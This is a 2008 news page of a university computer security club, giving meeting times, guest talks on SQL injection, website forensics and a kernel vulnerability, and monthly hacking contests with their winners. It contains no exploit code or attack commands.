Fall '08 Meeting Schedule
Here's the meeting plan for this semester:
We meet every Tuesday @ 5pm in Gould-Simpson 906.
This semester we're preparing for the iCTF (that site may still say 2007 iCTF, but Giovanni assured me they're doing it again this year).
Mailing Lists Moved to Google Groups
We've setup a Google Group to replace the mailing list. You can continue to use it like a mailing list or, if you prefer, you can use it with your Google account and do fancy stuff like create pages of information for the group (tutorials, etc.)
More info on the mailing lists page.
Apr 29th Speaker: Shawn Nock on datacenter auditing
Shawn Nock from the University Information Technology Services (UITS) will be talking about datacenter security audits he has performed, some experiences, and will likely shows us some tools of the trade.
See you all there on Tuesday, April 29th @ 5pm, Gould-Simpson 906.
Contest #3
Contest #3 is up
It went online at 2008-04-22 08:39 MST (People at the meeting got a first peak).
This month's contest prize will be a book kindly donated by No Starch Press.
Winner: Silviu Smarandache [Thu, 24 Apr 2008 13:35:37 -0700]
Prize still available to runner up! Silviu knows he can't get the book every time, so if somebody else can solve this they can win the book!
Recap of last few meetings
We've had some great stuff at the last few meetings. Here's a quick summary:
- April 1: Silviu Smarandache showed us some great SQL injection techniques and showed us his winning solution to Contest #2 (I'll post those solutions soon).
- March 25: I walked us through forensics on a compromised website, using filesystem modification times and webserver logs files to identify how the site was compromised (which turned out to be some very poorly written code combined with a comically bad administrator password). We also took a quick look at some interesting scripts the attackers left behind.
- March 18: no meeting (spring break)
- March 11: Keith Larrimore gave us an awesome presentation on the vmsplice vulnerability, walking us through the vulnerable kernel code and the simple mistakes that led to the major problem.
Contest #2
Contest #2 is up
It went online at 2008-02-25 01:10 MST (a little over an hour after planned).
This month's contest prize will be a book kindly donated by No Starch Press.
Winner: Silviu Smarandache won the contest at 2008-02-25 09:47:45 MST. He doesn't get the book, though, as he won a book recently (last contest). No second place was attained before enough hints were given to inspire the club to award a book to the runner up. That just means, more books left for future prizes!
Meeting schedule decided
The first meeting on Tuesday went great. More than 30 people showed up! Much fun and learning was had by all.
It was decided that we should have meetings every Tuesday at 5pm.
All meetings will be in Gould-Simpson 906 with the exception of the Feb. 26 meeting.
The next informal meeting will be Tuesday, February 26. Note: This meeting will be in a different room than normal. We'll meet in GS 701 rather than GS 906.
The next regular meeting will be Tuesday, March 4. Keith Larrimore is going to talk about the recent vmsplice kernel vulnerability. Don't miss it!
First Meeting: Tuesday, Feb. 19, 5:00pm, GS 906
Our first meeting has been scheduled, mark your calendars:
Tuesday, Feb. 19, 5:00pm, Gould-Simpson 906If you can't make it at that time, please complain! It could turn out we find a time where more people can show up, and we won't know unless you complain. Send your complaints to info -at- uacompsec.org.
Contest #1: SQL Injection for Web App Account Access
Security Contest #1 is up for those wanting to try their hand at exploiting an insecure web application using sql injection:
You can find the contest page here.
There are two different challenges in this contest:* Easy challenge: Can you get logged in as the user "admin"? (That is, can you get shown the "Welcome" message along with the user's "secret info" which is displayed after they login?)
* Hard challenge: Can you get the unhashed password for the user "admin" so that you can login just as that user would? (That is, can you obtain enough information such that you can login without sql injection?)
Want a tip? Have a gripe? Want to see if you were first and won? Send your victory reports, questions and comments to info -at- uacompsec.org.
Note: The contest is intended for University of Arizona students and faculty. If you aren't from the UA, you are welcome to give it a try, but you won't be credited with winning the contest and non-UA IP addresses are subject to blocking if they are abusive.
Hard challenge results:
Winner: Silviu Smarandache [Thu, 14 Feb 2008 11:53:49 MST]
1st runner up: Keith Larrimore [Thu, 14 Feb 2008 15:55:00 MST]
2nd runner up: Todd Knight [Fri, 15 Feb 2008 11:46:05 MST]
(Silviu: Sorry for missing your email initially! Not enough sleep and small my mind lose.)
If you're enjoying the challenge, don't stop just because someone else got there first! Maybe we'll even list people in order of time they reported the solution, or maybe your solution will be more elegant. We'll discuss the different solutions at the meeting on Tuesday and post them afterwards.